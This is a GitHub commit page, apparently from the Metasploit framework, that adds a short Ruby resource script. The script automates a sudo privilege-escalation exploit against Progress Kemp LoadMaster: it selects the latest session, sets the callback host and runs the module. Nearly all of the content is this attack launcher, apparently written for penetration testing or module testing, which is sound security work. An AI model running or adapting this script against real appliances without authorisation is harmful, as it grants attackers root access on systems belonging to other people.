Skip to content

Commit

Permalink
Actually add script contents
Browse files Browse the repository at this point in the history
  • Loading branch information
bwatters-r7 committed Apr 17, 2024
1 parent b264ef9 commit 8071197
Showing 1 changed file with 8 additions and 0 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
<ruby>
print_status("Running Progress Kemp Loadmaster sudo Privilege Escalation")
run_single("use modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024")
run_single("set session -1")
session_lhost = framework.sessions[framework.sessions.keys.last].tunnel_local.split(':')[0..-2].join(':')
run_single("set lhost #{session_lhost}")
run_single("run")
</ruby>

0 comments on commit 8071197

Please sign in to comment.